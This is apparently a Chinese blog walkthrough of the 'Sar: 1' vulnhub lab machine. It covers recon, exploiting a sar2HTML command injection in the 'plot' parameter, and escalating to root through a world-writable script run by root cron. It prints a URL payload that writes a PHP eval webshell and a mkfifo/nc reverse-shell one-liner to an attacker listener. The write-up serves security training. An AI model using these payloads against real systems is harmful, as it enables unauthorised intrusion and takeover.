WEB

WEB安全

漏洞复现

CTF

常用工具

实战

代码审计

后渗透

内网渗透

免杀

进程注入

权限提升

漏洞复现

靶机

vulnstack

vulnhub

Root-Me

编程语言

java

逆向

PE

逆向学习

HEVD

其它

关于博客

面试

杂谈

Sar: 1

0x01 信息收集

先用nmap探测一下开放的端口

只开放了一个80,访问一下看看

就是一个apache的默认界面,扫一扫路径看看

看看robots.txt

提示了一个路径,去看看

是一个不知道什么系统,左上角写出来了,去查查有没有相关的漏洞

有一个RCE,exp说输出在select host里,用whoami试一下

得到回显当前用户是www-data

0x02 getshell

已经可以执行命令了看看能不能直接反弹shell,使用bash反弹没有反应,再试试写一句话

1
http://192.168.163.150/sar2HTML/index.php?plot=;echo%20%27%3C?php%20eval($_POST[pass]);%20?%3E%27%20%3Epass.php

可以写入一句话木马,然后使用蚁剑连接

随便看一下漏洞出现在哪里

在这里GET或者POST得到参数

这里把两个字符串拼接然后传入exec里面执行命令,使用;截断命令造成了rce

0x03 提权

前面whoami看到了当前用户为www-data,需要提权,系统是ubuntu18.04,内核为5.0.0,应该是没有内核提权漏洞的,看看可不可以使用suid提权

看到一个pkexec,虽然我不知道是啥但是感觉和这个有关,去查了一下好像真有相关的提权脚本

https://www.exploit-db.com/exploits/47163

看了下版本和系统刚好都有点关系,虽然看不懂还是试试看吧

用提权脚本一定要使用全交互式的shell,所以先把半交互式的shell提升一下,先反弹一个shell回来

bash反弹shell一直报错,不知道什么原因,可能这也是刚刚没弹回来的原因,看了一下安装了nc,使用nc反弹,但是nc又不支持-e参数,去找了文章看了看没有-e也可以反弹

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.163.128 60001 >/tmp/f

执行这条命令之后反弹成功

https://blog.csdn.net/qq_43147039/article/details/103365433

升级shell看的是这篇文章

环境里面没有python2之后python3,用python3也可以

有几个地方要注意一下

输入stty raw -echo之后你输出的命令就不会有显示出来了,但是实际还是有输出的,所以输入fg直接回车就好,然后会出来之前监听端口的命令继续回车就行

输入reset会出现图中出现unknow什么的直接Ctrl-C退出继续输入解析来的命令就行

最后获得了一个全交互式的shell

下载exp用kali的gcc编译一下然后传上去执行试试

并没有执行成功,emmm还要再找找别的方法

翻来翻去在love用户的桌面文件夹下翻到一个user.txt里面有一串md5,解密出来是user.txt(后来才知道这是题目中的一个key..我竟然还拿去解密了)

又找了一些方法看到一种通过修改定时任务得到shell的方法,先看看有什么定时任务

看到最后一行以root权限执行了一个脚本,之前翻的时候还看到过这个脚本还不知道有啥用,去看一下里面写着啥

立案执行了另外一个脚本,再去看那个脚本里面是创建文件的命令,finally.sh是755不可写,但是write.sh是777可写,修改一下write.sh,把里面的命令换成反弹shell的命令

然后去监听60002端口等着就行了

获得root权限